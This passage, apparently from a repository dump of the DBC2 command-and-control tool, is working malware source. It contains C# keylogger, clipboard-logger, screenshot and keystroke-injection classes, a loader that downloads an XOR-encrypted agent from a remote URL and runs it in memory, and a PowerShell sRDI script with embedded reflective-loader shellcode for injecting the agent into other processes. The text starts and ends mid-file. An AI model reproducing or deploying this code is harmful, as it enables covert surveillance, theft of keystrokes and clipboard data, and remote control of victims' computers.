WM_CLIPBOARDUPDATE = 0x031D; internal static IntPtr HWND_MESSAGE = new IntPtr(-3); } //**************************************************************************************** // Class handling keylogging operations and thread //**************************************************************************************** public static class KeyLogger { public delegate void KeyEventDelegate(Keys key); private static Thread _pollingThread; private static volatile Dictionary _keysStates = new Dictionary(); private static bool exit = false; //------------------------------------------------------------------------------ public static void Start() { if (_pollingThread != null && _pollingThread.IsAlive) { return; } foreach (Keys key in Enum.GetValues(typeof(Keys))) { _keysStates[key] = false; } _pollingThread = new Thread(PollKeys) { IsBackground = true, Name = "KeyThread" }; _pollingThread.Start(); } //------------------------------------------------------------------------------ public static void Stop() { exit = true; } //------------------------------------------------------------------------------ private static void PollKeys() { while (true) { Thread.Sleep(40); foreach (Keys key in Enum.GetValues(typeof(Keys))) { if (((NativeFunctions.GetAsyncKeyState(key) & (1 << 15)) != 0)) { if (_keysStates[key]) continue; if (OnKeyDown != null) OnKeyDown.Invoke(key); _keysStates[key] = true; } else { if (!_keysStates[key]) continue; if (OnKeyUp != null) OnKeyUp.Invoke(key); _keysStates[key] = false; } } if (exit) break; } } public static event KeyEventDelegate OnKeyDown; public static event KeyEventDelegate OnKeyUp; } //**************************************************************************************** // Class handling clipboard logging operations and thread //**************************************************************************************** public static class ClipboardLogger { public delegate void ClipboardEventDelegate(string text); private static Thread _pollingThread; private static bool exit = false; private static TextBox tb; private static string lastContent; //------------------------------------------------------------------------------ public static void Start() { if (_pollingThread != null && _pollingThread.IsAlive) { return; } tb = new TextBox(); tb.Multiline = true; lastContent = ""; _pollingThread = new Thread(PollClipboard) { IsBackground = true, Name = "ClipboardThread" }; _pollingThread.Start(); } //------------------------------------------------------------------------------ public static void Stop() { exit = true; } //------------------------------------------------------------------------------ private static void PollClipboard() { while (true) { Thread.Sleep(1000); tb.Paste(); if (tb.Text != lastContent) { lastContent = tb.Text; if (OnKeyBoardEvent != null) OnKeyBoardEvent.Invoke(tb.Text); } tb.Clear(); if (exit) break; } } public static event ClipboardEventDelegate OnKeyBoardEvent; } //**************************************************************************************** // Class for sending key strokes to a remote process //**************************************************************************************** public static class KeyStrokes { //================================================================================================== // This method sends key strokes to a specified process identified by its name //================================================================================================== public static bool sendKeyStrokes(Process p, string keyStrokes) { try { IntPtr h = p.MainWindowHandle; // Find the process main Window NativeFunctions.SetForegroundWindow(h); // Set the process main window to foreground NativeFunctions.ShowWindow(h.ToInt32(),9); // Restore the window, in case it was minimized SendKeys.SendWait(keyStrokes); // Send the keytrokes to the process return true; } catch (Exception ex) { // Log the exception #if (DEBUG) while (ex != null) { Console.WriteLine("[ERROR] " + ex.Message); ex = ex.InnerException; } #endif return false; } } } //**************************************************************************************** // Class for taking screenshot //**************************************************************************************** public static class Screenshot { //================================================================================================== // This method returns a byte array of a JPG screenshot of all system's screens //================================================================================================== public static byte[] takeScreenShot() { int width = 0, height = 0; // Get all system screens (display, or monitors) Screen[] systemScreens = Screen.AllScreens; foreach (Screen screen in systemScreens) { Rectangle screenSize = screen.Bounds; width += screenSize.Width; if (screenSize.Height > height) height = screenSize.Height; } // Take a screenshot of the whole display, including all screens Bitmap target = new Bitmap(width, height); using (Graphics g = Graphics.FromImage(target)) { g.CopyFromScreen(0, 0, 0, 0, new Size(width, height)); } // Convert this screenshot to JPEG format and to a byte array in memory using (var stream = new MemoryStream()) { target.Save(stream, System.Drawing.Imaging.ImageFormat.Jpeg); return stream.ToArray(); } } } } ================================================ FILE: dbc2Loader/dbc2Loader.cs ================================================ /* Author: Arno0x0x, Twitter: @Arno0x0x What this program does: ----------------------- This assembly loads the DBC2 agent from a remote URL, xor decrypt it, then loads it in memory and starts it. What is its purpose ? ----------------------- dbc2Loader acts as a lightweight wrapper DLL dor the DBC2 agent. It is currently useful for two things: 1/ Allowing it to loaded through DotNetToJScript, which gives us a new JScript loader for the DBC2 agent 2/ Can be loaded from a native wrapper DLL hosting the .Net CLR, and then this native wrapper DLL can be transformed into a position independant shellcode thanks to sRDI. This allows for injecting the DBC2 agent in virtually any process ! -------------------- Compile for x64 platform ---------------- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:dbc2Loader.dll dbc2Loader.cs C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:dbc2Loader.exe dbc2Loader.cs -------------------- Compile for x86 platform ---------------- C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:dbc2Loader.dll dbc2Loader.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:dbc2Loader.exe dbc2Loader.cs */ using System; using System.Net; using System.Runtime.InteropServices; using System.Reflection; using System.Windows.Forms; namespace dbc2Loader { [ComVisible(true)] public class dbc2Loader { //======================================================================================== // Constructor... //======================================================================================== public dbc2Loader() { } //======================================================================================== // Returns the XOR encrpytion/decryption of a source byte array, given a key as a byte array //======================================================================================== private static byte[] xor(byte[] source, string key) { byte[] decrypted = new byte[source.Length]; for(int i = 0; i < source.Length; i++) { decrypted[i] = (byte) (source[i] ^ key[i % key.Length]); } return decrypted; } //======================================================================================== // Main function called in case of compiled as an EXEcutable //======================================================================================== public static void Main(string[] args) { if (args.Length == 2) { (new dbc2Loader()).loadDBC2(args[0], args[1], args[2], args[3]); } else { Console.WriteLine("[ERROR] Missing arguments"); } } //======================================================================================== // Function used when called from native unmanaged code //======================================================================================== public static int entryPoint(string arg) { string[] args = arg.Split('|'); (new dbc2Loader()).loadDBC2(args[0], args[1], args[2], args[3]); return 0; } //======================================================================================== // Actual method loading the DBC2 agent in memory and executing it //======================================================================================== public void loadDBC2(string url, string xorKey, string accessToken, string masterKey) { //---------------------------------------------------------------------- // Download the dbc2 encrypted agent from the provided URL //---------------------------------------------------------------------- WebClient webClient = new WebClient(); IWebProxy defaultProxy = WebRequest.DefaultWebProxy; if (defaultProxy != null) { defaultProxy.Credentials = CredentialCache.DefaultCredentials; webClient.Proxy = defaultProxy; } byte[] dbc2Assembly = null; try { // Download the encrypted agent assembly and decrpyt it dbc2Assembly = xor(webClient.DownloadData(url),xorKey); } catch (Exception ex) { while (ex != null) { Console.WriteLine(ex.Message); ex = ex.InnerException; } } //---------------------------------------------------------------------- // Load assembly in memory //---------------------------------------------------------------------- Assembly assembly = Assembly.Load(dbc2Assembly); Type type = assembly.GetType("dropboxc2.C2_Agent"); // Setting DBC2 agent arguments: the access token and the master key string[] parameters = new string[] {accessToken, masterKey}; object[] parametersArray = new object[]{parameters}; try { // This will create an instance of the C2_Agent class, the constructor will start the whole job, so no further method call is required object classInstance = Activator.CreateInstance(type, parametersArray); } catch (Exception ex) { while (ex != null) { Console.WriteLine(ex.Message); ex = ex.InnerException; } } } } } ================================================ FILE: dbc2Loader/nativeWrapper/ConvertTo-Shellcode.ps1 ================================================ $Source = @" using System; using System.Collections.Generic; using System.Runtime.InteropServices; using System.Reflection; public class sRDI { [StructLayout(LayoutKind.Sequential, Pack = 1)] struct IMAGE_DATA_DIRECTORY { public uint VirtualAddress; public uint Size; } //[StructLayout(LayoutKind.Sequential, Pack = 1)] [StructLayout(LayoutKind.Explicit)] unsafe struct IMAGE_SECTION_HEADER { [FieldOffset(0)] public fixed byte Name[8]; [FieldOffset(8)] public uint PhysicalAddress; [FieldOffset(8)] public uint VirtualSize; [FieldOffset(12)] public uint VirtualAddress; [FieldOffset(16)] public uint SizeOfRawData; [FieldOffset(20)] public uint PointerToRawData; [FieldOffset(24)] public uint PointerToRelocations; [FieldOffset(28)] public uint PointerToLinenumbers; [FieldOffset(32)] public ushort NumberOfRelocations; [FieldOffset(34)] public ushort NumberOfLinenumbers; [FieldOffset(36)] public uint Characteristics; } [StructLayout(LayoutKind.Sequential, Pack = 1)] struct IMAGE_FILE_HEADER { public ushort Machine; public ushort NumberOfSections; public uint TimeDateStamp; public uint PointerToSymbolTable; public uint NumberOfSymbols; public ushort SizeOfOptionalHeader; public ushort Characteristics; } [StructLayout(LayoutKind.Sequential, Pack = 1)] struct IMAGE_EXPORT_DIRECTORY { public uint Characteristics; public uint TimeDateStamp; public ushort MajorVersion; public ushort MinorVersion; public uint Name; public uint Base; public uint NumberOfFunctions; public uint NumberOfNames; public uint AddressOfFunctions; // RVA from base of image public uint AddressOfNames; // RVA from base of image public uint AddressOfNameOrdinals; // RVA from base of image } enum IMAGE_DOS_SIGNATURE : ushort { DOS_SIGNATURE = 0x5A4D, // MZ OS2_SIGNATURE = 0x454E, // NE OS2_SIGNATURE_LE = 0x454C, // LE } enum MagicType : ushort { IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10b, IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20b, } [StructLayout(LayoutKind.Sequential, Pack = 1)] struct IMAGE_DOS_HEADER { public IMAGE_DOS_SIGNATURE e_magic; // Magic number public ushort e_cblp; // public bytes on last page of file public ushort e_cp; // Pages in file public ushort e_crlc; // Relocations public ushort e_cparhdr; // Size of header in paragraphs public ushort e_minalloc; // Minimum extra paragraphs needed public ushort e_maxalloc; // Maximum extra paragraphs needed public ushort e_ss; // Initial (relative) SS value public ushort e_sp; // Initial SP value public ushort e_csum; // Checksum public ushort e_ip; // Initial IP value public ushort e_cs; // Initial (relative) CS value public ushort e_lfarlc; // File address of relocation table public ushort e_ovno; // Overlay number [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 8)] public string e_res; // May contain 'Detours!' public ushort e_oemid; // OEM identifier (for e_oeminfo) public ushort e_oeminfo; // OEM information; e_oemid specific [MarshalAsAttribute(UnmanagedType.ByValArray, SizeConst = 10)] public ushort[] e_res2; // Reserved public ushorts public Int32 e_lfanew; // File address of new exe header } [StructLayout(LayoutKind.Sequential, Pack = 1)] struct IMAGE_OPTIONAL_HEADER { // // Standard fields. // public MagicType Magic; public byte MajorLinkerVersion; public byte MinorLinkerVersion; public uint SizeOfCode; public uint SizeOfInitializedData; public uint SizeOfUninitializedData; public uint AddressOfEntryPoint; public uint BaseOfCode; public uint BaseOfData; public uint ImageBase; public uint SectionAlignment; public uint FileAlignment; public ushort MajorOperatingSystemVersion; public ushort MinorOperatingSystemVersion; public ushort MajorImageVersion; public ushort MinorImageVersion; public ushort MajorSubsystemVersion; public ushort MinorSubsystemVersion; public uint Win32VersionValue; public uint SizeOfImage; public uint SizeOfHeaders; public uint CheckSum; public ushort Subsystem; public ushort DllCharacteristics; public uint SizeOfStackReserve; public uint SizeOfStackCommit; public uint SizeOfHeapReserve; public uint SizeOfHeapCommit; public uint LoaderFlags; public uint NumberOfRvaAndSizes; public IMAGE_DATA_DIRECTORY ExportTable; public IMAGE_DATA_DIRECTORY ImportTable; public IMAGE_DATA_DIRECTORY ResourceTable; public IMAGE_DATA_DIRECTORY ExceptionTable; public IMAGE_DATA_DIRECTORY CertificateTable; public IMAGE_DATA_DIRECTORY BaseRelocationTable; public IMAGE_DATA_DIRECTORY Debug; public IMAGE_DATA_DIRECTORY Architecture; public IMAGE_DATA_DIRECTORY GlobalPtr; public IMAGE_DATA_DIRECTORY TLSTable; public IMAGE_DATA_DIRECTORY LoadConfigTable; public IMAGE_DATA_DIRECTORY BoundImport; public IMAGE_DATA_DIRECTORY IAT; public IMAGE_DATA_DIRECTORY DelayImportDescriptor; public IMAGE_DATA_DIRECTORY CLRRuntimeHeader; public IMAGE_DATA_DIRECTORY Public; } [StructLayout(LayoutKind.Sequential, Pack = 1)] struct IMAGE_OPTIONAL_HEADER64 { public MagicType Magic; public byte MajorLinkerVersion; public byte MinorLinkerVersion; public uint SizeOfCode; public uint SizeOfInitializedData; public uint SizeOfUninitializedData; public uint AddressOfEntryPoint; public uint BaseOfCode; public ulong ImageBase; public uint SectionAlignment; public uint FileAlignment; public ushort MajorOperatingSystemVersion; public ushort MinorOperatingSystemVersion; public ushort MajorImageVersion; public ushort MinorImageVersion; public ushort MajorSubsystemVersion; public ushort MinorSubsystemVersion; public uint Win32VersionValue; public uint SizeOfImage; public uint SizeOfHeaders; public uint CheckSum; public ushort Subsystem; public ushort DllCharacteristics; public ulong SizeOfStackReserve; public ulong SizeOfStackCommit; public ulong SizeOfHeapReserve; public ulong SizeOfHeapCommit; public uint LoaderFlags; public uint NumberOfRvaAndSizes; public IMAGE_DATA_DIRECTORY ExportTable; public IMAGE_DATA_DIRECTORY ImportTable; public IMAGE_DATA_DIRECTORY ResourceTable; public IMAGE_DATA_DIRECTORY ExceptionTable; public IMAGE_DATA_DIRECTORY CertificateTable; public IMAGE_DATA_DIRECTORY BaseRelocationTable; public IMAGE_DATA_DIRECTORY Debug; public IMAGE_DATA_DIRECTORY Architecture; public IMAGE_DATA_DIRECTORY GlobalPtr; public IMAGE_DATA_DIRECTORY TLSTable; public IMAGE_DATA_DIRECTORY LoadConfigTable; public IMAGE_DATA_DIRECTORY BoundImport; public IMAGE_DATA_DIRECTORY IAT; public IMAGE_DATA_DIRECTORY DelayImportDescriptor; public IMAGE_DATA_DIRECTORY CLRRuntimeHeader; public IMAGE_DATA_DIRECTORY Public; } [StructLayout(LayoutKind.Sequential, Pack = 1)] struct IMAGE_NT_HEADERS64 { public uint Signature; public IMAGE_FILE_HEADER FileHeader; public IMAGE_OPTIONAL_HEADER64 OptionalHeader; } [StructLayout(LayoutKind.Sequential, Pack = 1)] struct IMAGE_NT_HEADERS { public uint Signature; public IMAGE_FILE_HEADER FileHeader; public IMAGE_OPTIONAL_HEADER OptionalHeader; } public static unsafe class InteropTools { private static readonly Type SafeBufferType = typeof(SafeBuffer); public delegate void PtrToStructureNativeDelegate(byte* ptr, TypedReference structure, uint sizeofT); public delegate void StructureToPtrNativeDelegate(TypedReference structure, byte* ptr, uint sizeofT); const BindingFlags flags = BindingFlags.NonPublic | BindingFlags.Static; private static readonly MethodInfo PtrToStructureNativeMethod = SafeBufferType.GetMethod("PtrToStructureNative", flags); private static readonly MethodInfo StructureToPtrNativeMethod = SafeBufferType.GetMethod("StructureToPtrNative", flags); public static readonly PtrToStructureNativeDelegate PtrToStructureNative = (PtrToStructureNativeDelegate)Delegate.CreateDelegate(typeof(PtrToStructureNativeDelegate), PtrToStructureNativeMethod); public static readonly StructureToPtrNativeDelegate StructureToPtrNative = (StructureToPtrNativeDelegate)Delegate.CreateDelegate(typeof(StructureToPtrNativeDelegate), StructureToPtrNativeMethod); private static readonly Func SizeOfHelper_f = (Func)Delegate.CreateDelegate(typeof(Func), typeof(Marshal).GetMethod("SizeOfHelper", flags)); public static void StructureToPtrDirect(TypedReference structure, IntPtr ptr, int size) { StructureToPtrNative(structure, (byte*)ptr, unchecked((uint)size)); } public static void StructureToPtrDirect(TypedReference structure, IntPtr ptr) { StructureToPtrDirect(structure, ptr, SizeOf(__reftype(structure))); } public static void PtrToStructureDirect(IntPtr ptr, TypedReference structure, int size) { PtrToStructureNative((byte*)ptr, structure, unchecked((uint)size)); } public static void PtrToStructureDirect(IntPtr ptr, TypedReference structure) { PtrToStructureDirect(ptr, structure, SizeOf(__reftype(structure))); } public static void StructureToPtr(ref T structure, IntPtr ptr) { StructureToPtrDirect(__makeref(structure), ptr); } public static void PtrToStructure(IntPtr ptr, out T structure) { structure = default(T); PtrToStructureDirect(ptr, __makeref(structure)); } public static T PtrToStructure(IntPtr ptr) { T obj; PtrToStructure(ptr, out obj); return obj; } public static int SizeOf(T structure) { return SizeOf(); } public static int SizeOf() { return SizeOf(typeof(T)); } public static int SizeOf(Type t) { return SizeOfHelper_f(t, true); } } public static IntPtr Rva2Offset(uint dwRva, IntPtr PEPointer) { bool is64Bit = false; ushort wIndex = 0; ushort wNumberOfSections = 0; IntPtr imageSectionPtr; IMAGE_SECTION_HEADER SectionHeader; int sizeOfSectionHeader = Marshal.SizeOf(typeof(IMAGE_SECTION_HEADER)); IMAGE_DOS_HEADER dosHeader = InteropTools.PtrToStructure(PEPointer); IntPtr NtHeadersPtr = (IntPtr)((UInt64)PEPointer + (UInt64)dosHeader.e_lfanew); var imageNtHeaders32 = (IMAGE_NT_HEADERS)Marshal.PtrToStructure(NtHeadersPtr, typeof(IMAGE_NT_HEADERS)); var imageNtHeaders64 = (IMAGE_NT_HEADERS64)Marshal.PtrToStructure(NtHeadersPtr, typeof(IMAGE_NT_HEADERS64)); if (imageNtHeaders64.OptionalHeader.Magic == MagicType.IMAGE_NT_OPTIONAL_HDR64_MAGIC) is64Bit = true; if (is64Bit) { imageSectionPtr = (IntPtr)(((Int64)NtHeadersPtr + (Int64)Marshal.OffsetOf(typeof(IMAGE_NT_HEADERS64), "OptionalHeader") + (Int64)imageNtHeaders64.FileHeader.SizeOfOptionalHeader)); SectionHeader = (IMAGE_SECTION_HEADER)Marshal.PtrToStructure(imageSectionPtr, typeof(IMAGE_SECTION_HEADER)); wNumberOfSections = imageNtHeaders64.FileHeader.NumberOfSections; } else { imageSectionPtr = (IntPtr)(((Int64)NtHeadersPtr + (Int64)Marshal.OffsetOf(typeof(IMAGE_NT_HEADERS), "OptionalHeader") + (Int64)imageNtHeaders32.FileHeader.SizeOfOptionalHeader)); SectionHeader = (IMAGE_SECTION_HEADER)Marshal.PtrToStructure(imageSectionPtr, typeof(IMAGE_SECTION_HEADER)); wNumberOfSections = imageNtHeaders32.FileHeader.NumberOfSections; } if (dwRva < SectionHeader.PointerToRawData) return (IntPtr)((UInt64)dwRva + (UInt64)PEPointer); for (wIndex = 0; wIndex < wNumberOfSections; wIndex++) { SectionHeader = (IMAGE_SECTION_HEADER)Marshal.PtrToStructure((IntPtr)((uint)imageSectionPtr + (uint)(sizeOfSectionHeader * (wIndex))), typeof(IMAGE_SECTION_HEADER)); if (dwRva >= SectionHeader.VirtualAddress && dwRva < (SectionHeader.VirtualAddress + SectionHeader.SizeOfRawData)) return (IntPtr)((UInt64)(dwRva - SectionHeader.VirtualAddress + SectionHeader.PointerToRawData) + (UInt64)PEPointer); } return IntPtr.Zero; } public static unsafe bool Is64BitDLL(byte[] dllBytes) { bool is64Bit = false; GCHandle scHandle = GCHandle.Alloc(dllBytes, GCHandleType.Pinned); IntPtr scPointer = scHandle.AddrOfPinnedObject(); IMAGE_DOS_HEADER dosHeader = (IMAGE_DOS_HEADER)Marshal.PtrToStructure(scPointer, typeof(IMAGE_DOS_HEADER)); IntPtr NtHeadersPtr = (IntPtr)((UInt64)scPointer + (UInt64)dosHeader.e_lfanew); var imageNtHeaders64 = (IMAGE_NT_HEADERS64)Marshal.PtrToStructure(NtHeadersPtr, typeof(IMAGE_NT_HEADERS64)); var imageNtHeaders32 = (IMAGE_NT_HEADERS)Marshal.PtrToStructure(NtHeadersPtr, typeof(IMAGE_NT_HEADERS)); if (imageNtHeaders64.Signature != 0x00004550) throw new ApplicationException("Invalid IMAGE_NT_HEADER signature."); if (imageNtHeaders64.OptionalHeader.Magic == MagicType.IMAGE_NT_OPTIONAL_HDR64_MAGIC) is64Bit = true; scHandle.Free(); return is64Bit; } [UnmanagedFunctionPointer(CallingConvention.StdCall)] delegate IntPtr ReflectiveLoader(); [UnmanagedFunctionPointer(CallingConvention.Cdecl)] delegate bool ExportedFunction(IntPtr userData, uint userLength); public static byte[] ConvertToShellcode(byte[] dllBytes, uint functionHash, byte[] userData) { var rdiShellcode64 = new byte[] { 0xe9, 0x1b, 0x04, 0x00, 0x00, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xec, 0x10, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x8b, 0xf1, 0x33, 0xed, 0x48, 0x8b, 0x50, 0x18, 0x4c, 0x8b, 0x4a, 0x10, 0x4d, 0x8b, 0x41, 0x30, 0x4d, 0x85, 0xc0, 0x0f, 0x84, 0xb9, 0x00, 0x00, 0x00, 0x41, 0x0f, 0x10, 0x41, 0x58, 0x49, 0x63, 0x40, 0x3c, 0x4d, 0x8b, 0x09, 0x46, 0x8b, 0x9c, 0x00, 0x88, 0x00, 0x00, 0x00, 0x8b, 0xd5, 0xf3, 0x0f, 0x7f, 0x04, 0x24, 0x45, 0x85, 0xdb, 0x74, 0xd3, 0x48, 0x8b, 0x04, 0x24, 0x48, 0xc1, 0xe8, 0x10, 0x66, 0x3b, 0xe8, 0x73, 0x26, 0x48, 0x8b, 0x4c, 0x24, 0x08, 0x44, 0x0f, 0xb7, 0x54, 0x24, 0x02, 0x0f, 0xbe, 0x01, 0xc1, 0xca, 0x0d, 0x80, 0x39, 0x61, 0x7c, 0x06, 0x8d, 0x54, 0x02, 0xe0, 0xeb, 0x02, 0x03, 0xd0, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xca, 0x75, 0xe5, 0x4f, 0x8d, 0x14, 0x18, 0x8b, 0xcd, 0x45, 0x8b, 0x5a, 0x20, 0x4d, 0x03, 0xd8, 0x41, 0x39, 0x6a, 0x18, 0x76, 0x8d, 0x41, 0x8b, 0x1b, 0x8b, 0xfd, 0x49, 0x03, 0xd8, 0x49, 0x83, 0xc3, 0x04, 0x0f, 0xbe, 0x03, 0xc1, 0xcf, 0x0d, 0x48, 0xff, 0xc3, 0x03, 0xf8, 0x40, 0x38, 0x6b, 0xff, 0x75, 0xef, 0x8d, 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0xff, 0xd5, 0x4c, 0x8b, 0xc6, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0xd3, 0x45, 0x85, 0xe4, 0x0f, 0x84, 0x99, 0x00, 0x00, 0x00, 0x83, 0xbd, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8c, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xd7, 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74, 0x7a, 0x83, 0x7a, 0x14, 0x00, 0x74, 0x74, 0x44, 0x8b, 0x52, 0x20, 0x44, 0x8b, 0x42, 0x24, 0x33, 0xdb, 0x4c, 0x03, 0xd7, 0x4c, 0x03, 0xc7, 0x45, 0x85, 0xdb, 0x74, 0x5f, 0x45, 0x8b, 0x0a, 0x4c, 0x03, 0xcf, 0x33, 0xc9, 0x41, 0x0f, 0xbe, 0x01, 0xc1, 0xc9, 0x0d, 0x4c, 0x03, 0xce, 0x03, 0xc8, 0x41, 0x80, 0x79, 0xff, 0x00, 0x75, 0xed, 0x44, 0x3b, 0xe1, 0x74, 0x10, 0x03, 0xde, 0x49, 0x83, 0xc2, 0x04, 0x4d, 0x03, 0xc6, 0x41, 0x3b, 0xdb, 0x72, 0xd2, 0xeb, 0x2f, 0x41, 0x0f, 0xb7, 0x00, 0x83, 0xf8, 0xff, 0x74, 0x26, 0x8b, 0x52, 0x1c, 0xc1, 0xe0, 0x02, 0x48, 0x63, 0xc8, 0x48, 0x8d, 0x04, 0x0f, 0x48, 0x8b, 0x8c, 0x24, 0x80, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x04, 0x02, 0x8b, 0x94, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x03, 0xc7, 0x41, 0xff, 0xd0, 0x48, 0x8b, 0xc7, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc, 0xcc, 0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20, 0xe8, 0xdf, 0xfc, 0xff, 0xff, 0x48, 0x8b, 0xe6, 0x5e, 0xc3 }; var rdiShellcode32 = new byte[] { 0x55, 0x8b, 0xec, 0x83, 0xec, 0x18, 0x53, 0x56, 0x57, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xe8, 0x44, 0x02, 0x00, 0x00, 0x89, 0x45, 0xf4, 0xc7, 0x04, 0x24, 0x49, 0xf7, 0x02, 0x78, 0xe8, 0x35, 0x02, 0x00, 0x00, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0x89, 0x45, 0xec, 0xe8, 0x28, 0x02, 0x00, 0x00, 0x68, 0xaf, 0xb1, 0x5c, 0x94, 0x8b, 0xf8, 0xe8, 0x1c, 0x02, 0x00, 0x00, 0x8b, 0x5d, 0x08, 0x8b, 0x73, 0x3c, 0x83, 0xc4, 0x0c, 0x6a, 0x40, 0x68, 0x00, 0x30, 0x00, 0x00, 0x03, 0xf3, 0xff, 0x76, 0x50, 0x89, 0x45, 0xe8, 0x6a, 0x00, 0xff, 0xd7, 0x8b, 0xc8, 0x8b, 0x46, 0x54, 0x89, 0x4d, 0xfc, 0x8b, 0xfb, 0x85, 0xc0, 0x74, 0x0b, 0x2b, 0xcb, 0x8a, 0x17, 0x88, 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0x08, 0x74, 0x1d, 0xff, 0x45, 0xfc, 0x8b, 0x7d, 0xfc, 0x3b, 0x7e, 0x18, 0x72, 0xcc, 0x8b, 0x48, 0x18, 0x85, 0xc9, 0x0f, 0x85, 0x56, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x5f, 0x5e, 0x5b, 0xc9, 0xc3, 0x8b, 0x55, 0xfc, 0x8b, 0x46, 0x24, 0x8d, 0x04, 0x50, 0x0f, 0xb7, 0x04, 0x08, 0x8b, 0x56, 0x1c, 0x8d, 0x04, 0x82, 0x8b, 0x04, 0x08, 0x03, 0xc1, 0xeb, 0xe1 }; var newShellcode = new List(); if (Is64BitDLL(dllBytes)) { var rdiShellcode = rdiShellcode64; int bootstrapSize = 34; // call next instruction (Pushes next instruction address to stack) newShellcode.Add(0xe8); newShellcode.Add(0x00); newShellcode.Add(0x00); newShellcode.Add(0x00); newShellcode.Add(0x00); //Here is where the we pop the address of our shellcode off the stack and into the first register // pop rcx newShellcode.Add(0x59); // mov r8, rcx - Backup our memory location to RCX before we start subtracting newShellcode.Add(0x49); newShellcode.Add(0x89); newShellcode.Add(0xc8); // Put the location of the DLL into RCX // add rcx, - 5 (For our call instruction) + newShellcode.Add(0x48); newShellcode.Add(0x81); newShellcode.Add(0xc1); foreach (byte b in BitConverter.GetBytes((uint)(bootstrapSize - 5 + rdiShellcode.Length))) newShellcode.Add(b); // mov edx, newShellcode.Add(0xba); foreach (byte b in BitConverter.GetBytes((uint)functionHash)) newShellcode.Add(b); // Put the location of our user data in // add r8, (Size of bootstrap) + + newShellcode.Add(0x49); newShellcode.Add(0x81); newShellcode.Add(0xc0); foreach (byte b in BitConverter.GetBytes((uint)(bootstrapSize - 5 + rdiShellcode.Length + dllBytes.Length))) newShellcode.Add(b); // mov r9d, newShellcode.Add(0x41); newShellcode.Add(0xb9); foreach (byte b in BitConverter.GetBytes((uint)userData.Length)) newShellcode.Add(b); //Write the rest of RDI foreach (byte b in rdiShellcode) newShellcode.Add(b); //Write our DLL dllBytes[0] = 0x00; dllBytes[1] = 0x00; foreach (byte b in dllBytes) newShellcode.Add(b); //Write our userdata foreach (byte b in userData) newShellcode.Add(b); } else // 32 Bit { var rdiShellcode = rdiShellcode32; int bootstrapSize = 40; // call next instruction (Pushes next instruction address to stack) newShellcode.Add(0xe8); newShellcode.Add(0x00); newShellcode.Add(0x00); newShellcode.Add(0x00); newShellcode.Add(0x00); //Here is where the we pop the address of our shellcode off the stack and into the first register // pop ecx newShellcode.Add(0x58); // mov ebx, eax - copy our location in memory to ebx before we start modifying eax newShellcode.Add(0x89); newShellcode.Add(0xc3); // Put the location of the DLL into ECX // add eax, + newShellcode.Add(0x05); foreach (byte b in BitConverter.GetBytes((uint)(bootstrapSize - 5 + rdiShellcode.Length))) newShellcode.Add(b); // add ebx, + + newShellcode.Add(0x81); newShellcode.Add(0xc3); foreach (byte b in BitConverter.GetBytes((uint)(bootstrapSize - 5 + rdiShellcode.Length + dllBytes.Length))) newShellcode.Add(b); //push newShellcode.Add(0x68); foreach (byte b in BitConverter.GetBytes((uint)userData.Length)) newShellcode.Add(b); // push ebx newShellcode.Add(0x53); // push newShellcode.Add(0x68); foreach (byte b in BitConverter.GetBytes((uint)functionHash)) newShellcode.Add(b); // push eax newShellcode.Add(0x50); // call instruction - We need to transfer execution to the RDI assembly this way (Skip over our next few op codes) newShellcode.Add(0xe8); newShellcode.Add(0x04); newShellcode.Add(0x00); newShellcode.Add(0x00); newShellcode.Add(0x00); // add esp, 0x10 - RDI pushes things to the stack it never removes, we need to make the correction ourselves newShellcode.Add(0x83); newShellcode.Add(0xc4); newShellcode.Add(0x10); // ret - because we used call earlier newShellcode.Add(0xc3); //Write the rest of RDI foreach (byte b in rdiShellcode) newShellcode.Add(b); //Write our DLL dllBytes[0] = 0x00; dllBytes[1] = 0x00; foreach (byte b in dllBytes) newShellcode.Add(b); //Write our userdata foreach (byte b in userData) newShellcode.Add(b); } return newShellcode.ToArray(); } } "@ Function ConvertTo-Shellcode{ <# .SYNOPSIS Convert DLL file to position independent shellcode Author: Nick Landers (@monoxgas) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Uses ShellcodeRDI to bootstrap and shellcode PE loader to an existing file. When execution is passed to the converted shellcode, the DLL file is unpacked and loaded in memory. .EXAMPLE C:\PS> ConvertTo-Shellcode -File TestDLL_x86.dll .EXAMPLE C:\PS> import-module .\Invoke-Shellcode.ps1 C:\PS> Invoke-Shellcode -Shellcode (ConvertTo-Shellcode TestDLL_x64.dll) .PARAMETER File The target DLL file to convert .PARAMETER FunctionHash Hashed name of the function to call after DLLMain .PARAMETER UserData Data to pass to the target function #> [CmdletBinding()] Param( [Parameter(Mandatory=$True,Position=1)] [string]$File, [Parameter(Position=2)] [int]$FunctionHash = 0x30627745, #[int]$FunctionHash = 0xc59658c0, # dbc2 [Parameter(Position=3)] [string]$UserData = "" ) $Parameters = New-Object 